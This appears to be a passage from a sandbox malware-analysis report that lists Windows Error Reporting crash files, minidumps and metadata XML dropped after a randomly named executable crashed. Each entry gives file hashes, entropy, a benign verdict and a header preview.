Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9525676330358746
Encrypted:	false
SSDEEP:	192:7/eYzab0BU/NdadDjRJduzuiFZZ24IO8TdN:TDaoBU/N8xjPczuiFZY4IO8TH
MD5:	8C035D9486B201F5A34A9A600462FBB8
SHA1:	59A942C7EBEDF027355AABED1ABE0D58884525E3
SHA-256:	488297E96C5B3767F2FF1A7102197AD3422B36109283189BC9E8317E58BB5B3B
SHA-512:	CA55F151D2608D5B83FB4F3B3028128553AB70ED740E60F77A490B7DEA546C348A789E6D25B18CBD0CB43A93D5C00EB7FE162026D656DA7A3006AD947282F633
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.5.1.5.3.6.9.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.6.2.3.1.8.3.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.4.5.6.2.9.2.-.8.3.c.f.-.4.6.7.e.-.b.9.c.9.-.4.1.9.4.8.f.e.3.b.c.7.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.5.5.4.4.a.6.-.9.0.0.b.-.4.4.c.f.-.b.d.8.7.-.a.d.6.e.c.2.4.b.c.f.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.e.4.-.0.0.0.1.-.0.0.1.5.-.b.8.c.c.-.4.2.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_a07a19eb-58aa-4687-9255-fce0ec37e289\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9520175440616016
Encrypted:	false
SSDEEP:	192:F2geYz7b0BU/NdadDjRJduzuiFZZ24IO8TdN:BD7oBU/N8xjPczuiFZY4IO8TH
MD5:	D512B417EEED00A07495591B7D4B4A47
SHA1:	1EFD3B4AE0A810A0F23BE8C1E38284AF0BF42CD6
SHA-256:	A9CE04033CDCF787FD5EADBE214E51D8251535DD80B30916A282524AA9CE4819
SHA-512:	59F13405612EE085B16BF518C97418AA23DD81141CCDD9D11391CD9B8C5B0F0CE4E2EEC63D68D57717D06CE7054C5160E05195D84A7CF2E5DB0B35010F9E7BCA
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.0.4.3.7.8.1.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.1.1.7.2.1.9.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.7.a.1.9.e.b.-.5.8.a.a.-.4.6.8.7.-.9.2.5.5.-.f.c.e.0.e.c.3.7.e.2.8.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.f.7.6.b.f.2.-.1.1.6.9.-.4.1.1.d.-.8.c.2.9.-.a.e.4.7.5.c.d.0.a.c.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.8.-.0.0.0.1.-.0.0.1.5.-.0.9.0.a.-.4.a.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_af82a981-f2c9-418f-972b-16032feb6c37\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9524480323334774
Encrypted:	false
SSDEEP:	192:E7eYzQb0BU/NdadDjRJduzuiFZZ24IO8TdN3:4DQoBU/N8xjPczuiFZY4IO8TH
MD5:	E0EF447708E4BCA0128E86B8AD73B942
SHA1:	BB158F27333545F1BE29F09729AC8B3236301227
SHA-256:	A77133AF5E20FCCC1A46D6465080DD7E697FF430922128FA01CB717C4E72DFBF
SHA-512:	8CEFBD9BB132B8C48E29ED42ACCA21EC4F9642602F6BD6F7CD9A4D493770BD5C500A1634EE5F8A99E062EAF0F86E6BAAE0430496B2FE9BD3950BB54E3A9C6067
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.1.4.4.7.7.2.5.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.1.6.6.0.2.2.2.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.8.2.a.9.8.1.-.f.2.c.9.-.4.1.8.f.-.9.7.2.b.-.1.6.0.3.2.f.e.b.6.c.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.8.c.0.4.1.0.-.8.7.7.2.-.4.c.e.0.-.9.8.b.1.-.c.2.3.6.a.7.2.7.2.0.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.b.8.-.0.0.0.1.-.0.0.1.5.-.4.a.b.5.-.5.0.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_e74a49c3-c4c9-4224-a589-1a40ce962e81\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0201281356201843
Encrypted:	false
SSDEEP:	192:REPzb8eYzWb0BU/NdadDjRJdqTzuiFZZ24IO8TdNJ:ePMDWoBU/N8xjPyzuiFZY4IO8TH
MD5:	57BCBA8DF0005BEEEE413B3833EE2C55
SHA1:	42B57DD4D4B0F6C0392A6D7FC764CCF0273F5CA4
SHA-256:	A456D98C3393D1FEA47D3C4D1DE04154B42397A7553055FFA07991C198C0EF6D
SHA-512:	D3181B4274953146265760FA64D75EFF6FB05FFC6920B8A7685F2E27E41D41DAC305BE786244E6ECF08A7F24D50EF630451A0960805BA7563B95D267DA924454
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.7.0.1.2.6.9.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.3.0.9.9.7.0.4.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.4.a.4.9.c.3.-.c.4.c.9.-.4.2.2.4.-.a.5.8.9.-.1.a.4.0.c.e.9.6.2.e.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.4.5.d.f.c.c.-.d.2.f.8.-.4.7.5.f.-.b.0.8.b.-.f.e.b.0.8.5.0.e.8.d.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.a.8.-.0.0.0.1.-.0.0.1.5.-.2.7.f.d.-.3.e.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_edc31362-a803-4d4e-b740-b345ed571548\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9743978018925926
Encrypted:	false
SSDEEP:	192:681WzeYzvb0BU/NdadDjRJdKzuiFZZ24IO8TdN:dqDvoBU/N8xjP4zuiFZY4IO8TH
MD5:	05056A1D78399B5928C95CF38AF3391D
SHA1:	6EED11796496AEA955719B46785B13C305DF6B0E
SHA-256:	75E84BD155652AAA7878F51B61A3704363A58F3C907666704DBE86FBD6CB0403
SHA-512:	63E4DCF75113AE5B9476EE7F09DB511F69378E83E226225F232CB781194AFCBF19CC559DF5DC267A6E1F2EF278FD26CB4242451909267DF13BB53EAEB5CFE361
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.1.6.8.2.7.2.0.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.1.8.2.0.2.2.0.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.c.3.1.3.6.2.-.a.8.0.3.-.4.d.4.e.-.b.7.4.0.-.b.3.4.5.e.d.5.7.1.5.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.c.c.3.b.d.2.a.-.b.a.4.1.-.4.9.5.2.-.a.0.0.8.-.0.2.e.b.2.7.e.4.2.4.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.6.8.-.0.0.0.1.-.0.0.1.5.-.f.c.f.a.-.4.e.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_f7ee8616-6988-42f9-a04e-f8608642f576\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9523306586264042
Encrypted:	false
SSDEEP:	192:5eueYz2b0BU/NdadDjRJduzuiFZZ24IO8TdN:suD2oBU/N8xjPczuiFZY4IO8TH
MD5:	3D5560B5C958616582B0A93501684B2A
SHA1:	484030BBFD56BC0D1078211F7152151BAF9CB817
SHA-256:	866D2B3E92D40777C31B22CC1E3F0A20BD42CD3E64C1A79A9B3B70824A77C281
SHA-512:	B511D1F1FCF45122B07CC43529424CE7849349CF188545300B23A157B8D6B756C889B88829FB32A99D1425FAE0EC0ED6249932A04965E4C7658D438182ADB41E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.3.6.6.7.5.7.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.5.0.8.9.4.7.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.e.e.8.6.1.6.-.6.9.8.8.-.4.2.f.9.-.a.0.4.e.-.f.8.6.0.8.6.4.2.f.5.7.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.9.5.5.1.2.5.-.f.d.5.2.-.4.a.a.0.-.8.9.0.6.-.0.e.f.e.9.d.9.a.f.f.9.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.0.-.0.0.0.1.-.0.0.1.5.-.7.e.8.4.-.4.6.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2907.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:35 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	929818
Entropy (8bit):	1.8924456335011595
Encrypted:	false
SSDEEP:	1536:IlH0R+l3UBFo828GqU8X858jV0P+5i/L6jciOMDXvDwVQpP2iXZ0yTLzyn4kppzY:0Ll3Ko7aB0P+ZIiOUbFuHTuGgfGxcD
MD5:	EEE52CF0223E9D38F52B2837198935DB
SHA1:	8C9E157021F0CBF12A5708A8598326D14743A15A
SHA-256:	D28078D4D8FD9CFB2F5432A7C25AC9CBD36B999AF198746C8062DC6B50C9B5A6
SHA-512:	C3738080A42763E0E5AD321CE93BCF704E2AA100CD0E17F7DF728E93EA321825E8501386B8471BF37272E74361AF9B807565DDCF3EBF093C017E9408AB244537
Malicious:	false
Preview:	MDMP..a..... .......?;2g.....................................)...P..........T.......8...........T...........`i..............h0..........T2..............................................................................eJ.......2......GenuineIntel............T.......x....;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2936.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:34 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	95864
Entropy (8bit):	1.8250807255723995
Encrypted:	false
SSDEEP:	384:802JrBwOSLJd3uAhscA52ucYymfVUOkpZL:52JdwOSVsascg3yYA
MD5:	B835B28ABC572D44C048645A1582F136
SHA1:	C2404865CF8CF345CE2DA2666CECF2511EF290B8
SHA-256:	06821A4EDED431EABC0BF3AE51EBAE75E57D643BF65E19CABB939198378D7126
SHA-512:	991FFA61FF6DF45FF19C2570F2490C19C9CAF413D00D7CA1D3B31C08A045D50701C5B8F736A7F3179F7F1B8F8C79CA111F247B9119C2C338EC35FD829F46FCB8
Malicious:	false
Preview:	MDMP..a..... .......>;2g.........................................>..........T.......8...........T............!..pU..........P...........<...............................................................................eJ..............GenuineIntel............T............;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AFC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.7096948446459534
Encrypted:	false
SSDEEP:	192:R6l7wVeJ8i6i6Y2DJSU9dJgmfZppr089bMIsf0pEm:R6lXJh6i6Y0SU9zgmfZlM7fy
MD5:	9405C3C316A090B5A7168A50AED1CFC3
SHA1:	2E2973419AC862245E6B0055DD58BFCC2079DB38
SHA-256:	A2A4CD89AE7A81B91FA835FAA4325C41F387ACBD2EF61E07FFCBEF55890381F4
SHA-512:	AADD14B77EB296E54986269C3986B71A41A86E319E27608CC5B16CD9B7F85DB36483477B6AAE21EF48A06C6591DC1A9D14B72FD2B4556A64B0B0621075322717
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B4B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.529254549290389
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VYyYm8M4JIGFc++q8hb028dd:uIjfPI7zD7VmJS+wj8dd
MD5:	8611879891A9F19F81C4117012519862
SHA1:	73552707AF7272C0C1C75018E32FBBF272DA921F
SHA-256:	6525CB110625A17C92DCC0318371A4FC9B00755AD030BB0C149B36E1B68F43E0
SHA-512:	FDCD5374A909D172389FDF2F40241F3870BECE20C94598E3E58963B940D32DFD0AD55CA72EFDBB99549A82627DB81EE066E8AA52ED047F97AA138F36428F06A5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER30F7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8376
Entropy (8bit):	3.710339650499473
Encrypted:	false
SSDEEP:	192:R6l7wVeJzYA6L6Y2D2SU9dJgmfZpprY89bHOsfS2tm:R6lXJz6L6YrSU9zgmfZRHNfSd
MD5:	F59F389B8EF9346A271679D690D77B54
SHA1:	D72469D7EACA4BC8DC8BD6E9AB70CDCE3D2398C5
SHA-256:	345C7821E735C5792534701A446DE62595BA86EE4FA55E39D5AA9BAC2A575E6C
SHA-512:	6B1053711AB9171D00B8E7E972E7C2DA8DAD7DBDC7DB1B71438B41D840C0573470447529968AC987F36FC71FD5066BBB930165A1863CD5FC478AB4E42F79376E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3146.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.528932894091702
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VYAYm8M4JIGFP+q8hu+028sd:uIjfPI7zD7VwJZKj8sd
MD5:	F2F4017A1B2F7FF1C612C8D0D2AC8558
SHA1:	CCB9C4D86218083528A9691A7FD270CD9F5C97E0
SHA-256:	2B1E97472F3465A7F7890EE32ACD841B60FEB292592F6F02DB99AAA86B2AFB91
SHA-512:	3FE404D1FF5B6A4D831CFA42E68E6BEB41399FAD09FBD5FBBE82F95414806E4F48F75113F9B0E5C9D85FEF1AFAF09878CDC7F5093A1D0811E9302FED7DBDD7EB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER327D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	108266
Entropy (8bit):	1.7543058327736007
Encrypted:	false
SSDEEP:	192:tAILn/pJrU59TXTX5tYjgbOKdCRBS0LDodLi/lXIm3UucmmIZ4HkzgMhZWG1PYaZ:HUtYjnOCJLDodL24beZm1OZNPfqH/D
MD5:	AD1B32A2BC96E623AE6026434B33956F
SHA1:	3187DFDD80F57BA6657C4E0F99DF9587B345EB6B
SHA-256:	8796DC201A6DEB379CBD7104AD93F551688FEDF2AA2739BED69E0D580AD97472
